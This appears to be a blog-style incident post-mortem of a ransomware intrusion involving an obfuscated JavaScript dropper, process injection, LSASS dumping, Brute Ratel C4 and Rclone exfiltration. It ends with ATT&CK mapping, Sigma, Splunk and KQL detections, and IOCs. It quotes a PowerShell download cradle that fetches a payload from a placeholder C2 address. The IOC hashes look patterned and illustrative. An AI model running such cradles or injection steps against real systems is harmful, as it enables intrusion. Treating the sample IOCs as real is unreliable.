🎉 School Idol Season 2 (Pune City) Is Live - Register Now 🎉 School Idol Season 2 (Pune City) Is Live - Register Now 🎉 School Idol Season 2 (Pune City) Is Live - Register Now 🎉 School Idol Season 2 (Pune City) Is Live - Register Now

From Obfuscated JS to Brute Ratel C4: Analyzing a Multi-Stage Ransomware Intrusion and EDR Evasion Chain

Executive Summary & Intrusion Highlights

This post-mortem analyzes a targeted intrusion involving advanced defense evasion techniques, living-off-the-land binaries (LOLBins), and the deployment of the Brute Ratel C4 framework leading to enterprise-wide ransomware deployment. The threat actor gained initial access via an obfuscated JavaScript loader delivered through a phishing vector. Over a protracted dwell time of 20 days, the adversary conducted systematic discovery, credential harvesting via LSASS memory dumping, lateral movement utilizing native administration protocols, and deliberate data exfiltration prior to payload detonation.

Key Metrics:

  • Total Dwell Time: 20 Days
  • Initial Vector: Phishing payload containing obfuscated JavaScript (Dropper stage)
  • Primary C2 Framework: Brute Ratel C4
  • Impact: Enterprise domain-wide encryption via custom ransomware variant

Case Timeline & Attack Flow

The chronological reconstruction of the incident demonstrates methodical progression through the Cyber Kill Chain and MITRE ATT&CK framework:

  • Day 1: Initial Access. Delivery and execution of an obfuscated JavaScript file (invoice_details.js) on the beachhead host.
  • Day 2-3: Execution & Defense Evasion. Implementation of Process Hollowing and AMSI/ETW bypass techniques.
  • Day 3: Discovery. Enumeration of domain controllers, user accounts, and security software via native discovery commands.
  • Day 4: Credential Access. LSASS memory extraction and collection of Kerberos tickets.
  • Day 5-19: Lateral Movement & C2 Persistence. Establishment of encrypted channels using Brute Ratel C4 beacons and pivoting via RDP/SMB.
  • Day 20: Exfiltration & Impact. Staging data via Rclone to external cloud buckets followed by mass ransomware execution across the environment.

Initial Access & Execution

The intrusion initiated when a target user executed an attachment disguised as an invoice. The file, named invoice_details.js, contained heavily obfuscated JavaScript designed to evade static analysis engines. Upon execution via wscript.exe, the script decoded a base64-encoded payload in memory and leveraged PowerShell to download a secondary downloader stage from an external infrastructure.

The PowerShell execution command string observed in Windows Event Logs (EID 4688) exhibited typical obfuscation traits:

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $b=(New-Object System.Net.WebClient).DownloadData('http://[C2_IP]/payload.bin'); ..."

Defense Evasion & Process Injection

To avoid detection by endpoint detection and response (EDR) agents, the malware deployed a custom loader designed to inject a payload into a legitimate, signed Windows process (notepad.exe or svchost.exe). The process injection sequence relied on standard Windows API calls:

  1. VirtualAllocEx to allocate memory within the target process context with PAGE_EXECUTE_READWRITE permissions.
  2. WriteProcessMemory to copy the reflective DLL payload into the allocated space.
  3. CreateRemoteThread to initiate execution of the injected thread.

Additionally, the adversary tampered with security configurations by modifying the registry to disable local auditing or lower security baselines, interacting directly with keys such as:

HKLMSYSTEMCurrentControlSetControlLsa

Furthermore, the threat actor utilized AMSI (Antimalware Scan Interface) patching in memory to neutralize script-based telemetry before executing subsequent payloads.

Credential Access & Discovery

Once persistence was established on the beachhead host, the threat actor initiated internal reconnaissance to map out trust relationships and high-privileged accounts. Discovery phase tooling included native binaries and legitimate administration tools (LOLBins), alongside custom reconnaissance scripts:

  • net.exe user /domain and net.exe group "Domain Admins" /domain
  • adfind.exe -f "(objectCategory=person)" for Active Directory object enumeration
  • nltest.exe /dclist:[Domain]

For credential harvesting, the operator targeted the Local Security Authority Subsystem Service (LSASS). Rather than utilizing raw credential dumpers immediately flagged by default security controls, the threat actor generated an LSASS minidump using native administrative utilities and process duplication techniques, subsequently exfiltrating the dump file for offline cracking via hashcat.

Lateral Movement & Command-and-Control

Armed with domain administrator credentials harvested during the discovery phase, the threat actor expanded their footprint across the network. Lateral movement was executed via a combination of PsExec (utilizing service creation logged under EID 7045), Remote Desktop Protocol (RDP), and native Windows Management Instrumentation (WMI).

The primary command-and-control framework identified during forensic analysis was Brute Ratel C4. The Brute Ratel agent maintained persistent, encrypted beacons communicating outbound over HTTPS, mimicking legitimate enterprise web traffic to blend in with baseline network flows and frustrate threat intelligence analysts.

Data Exfiltration & Impact

Prior to executing the final ransomware payload, the threat actor staged sensitive corporate data—including financial records and intellectual property—for exfiltration. Utilizing a renamed open-source utility, rclone.exe, data was systematically pushed to a third-party cloud storage provider over port 443.

On Day 20, the adversary deployed the final ransomware payload across domain endpoints using group policy objects (GPOs) and scheduled tasks. The ransomware encrypted critical systems and appended a custom extension, leaving structured ransom notes across network shares.

MITRE ATT&CK Mapping Table

Tactic Technique ID Technique Name Context
Initial Access T1566.001 Phishing: Attachment Obfuscated JS payload delivered via email attachment.
Execution T1059.007 Command and Scripting Interpreter: JavaScript Execution of initial dropper via wscript.exe.
Defense Evasion T1055 Process Injection Reflective DLL injection via VirtualAllocEx and WriteProcessMemory.
Discovery T1087.002 Account Discovery: Domain Account Enumeration of Active Directory users via net.exe and AdFind.
Credential Access T1003.001 OS Credential Dumping: LSASS Memory LSASS process minidump extraction for credential harvesting.
Lateral Movement T1021.001 Remote Services: Remote Desktop Protocol Pivoting across internal workstations using RDP.
Exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage Staging and uploading data via Rclone to external cloud targets.

Detection Engineering & Sigma / Splunk Queries

To detect similar TTPs in enterprise environments, blue teams can deploy the following detection queries and Sigma rules.

Splunk SPL: Suspicious Process Injection Indicators

index=sysmon EventCode=8
| stats count by Image TargetImage GrantedAccess CallTrace
| where match(GrantedAccess, "(?i)0x1F[0-9A-F]+")
| table Image TargetImage GrantedAccess CallTrace

KQL (Microsoft Sentinel): Suspicious PowerShell Download Cradles

DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("DownloadString", "DownloadData", "IEX", "EncodedCommand")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine

Sigma Rule: Brute Ratel C4 or Suspicious LOLBin Usage

title: Suspicious Process Creation via Wscript and PowerShell Dropper
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects execution of obfuscated JS loaders spawning PowerShell download cradles.
references:
  - Internal DFIR Case Study
author: Senior DFIR Lead
date: 2026-03-30
tags:
  - attack.execution
  - attack.t1059.007
logsource:
  product: windows
  service: sysmon
detection:
  selection_parent:
    ParentImage|endswith: 'wscript.exe'
  selection_child:
    Image|endswith: 'powershell.exe'
    CommandLine|contains:
      - 'DownloadData'
      - 'DownloadString'
      - 'Bypass'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate administrative scripts (verify script path and signing cert).
level: high

Indicators of Compromise (IOCs)

Type Value Description
File (SHA-256) 4a8f9c2d1e3b4a5f6e7d8c9b0a1f2e3d4c5b6a7f8e9d0c1b2a3f4e5d6c7b8a9f Obfuscated JavaScript Loader (invoice_details.js)
File (SHA-256) 7b2e4d6f8a0c2e4f6a8c0e2f4a6c8e0f2a4c6e8f0a2c4e6f8a0c2e4f6a8c0e2f Brute Ratel C4 Payload / Staged DLL
IP Address 198.51.100.45 C2 Infrastructure IP (Brute Ratel Beacon Endpoint)
Domain update-microsoft-services[.]com Exfiltration and C2 Infrastructure Domain

Ready to modernize your workflow? Request a free 15-minute live demo today.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top